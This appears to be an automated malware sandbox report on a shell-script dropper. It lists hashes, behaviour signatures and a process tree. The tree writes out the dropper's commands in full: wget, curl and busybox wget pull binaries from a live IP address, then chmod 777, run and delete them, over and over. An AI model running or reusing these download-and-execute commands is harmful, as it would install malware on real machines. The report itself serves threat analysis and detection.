Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 962 chmod 764 chmod 890 chmod 902 chmod 914 chmod 920 chmod 926 chmod 944 chmod 746 chmod 752 chmod 884 chmod 956 chmod 968 chmod 818 chmod 824 chmod 839 chmod 932 chmod 938 chmod 950 chmod 974 chmod 792 chmod 861 chmod 872 chmod 878 chmod 896 chmod 908 chmod -
Executes dropped EXE 26 IoCs
Processes:
zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH71vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUYARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH7ioc pid Process /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 747 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 753 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 766 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 793 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 819 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 825 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 840 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 863 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 873 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 879 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 885 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 891 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 897 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 903 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 909 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 915 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 921 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 927 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 933 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 939 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 945 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 951 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 957 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 963 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 969 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 975 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl
Processes
-
/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:721
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:724
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:745
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:751
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:754
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:755
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:757
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:770
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:786
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:795
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:797
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:816
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:823
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:826
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:827
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:835
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:843
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:845
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:857
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:871
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:877
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:883
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:889
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:895
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:901
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:907
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:913
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:919
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:925
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:931
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
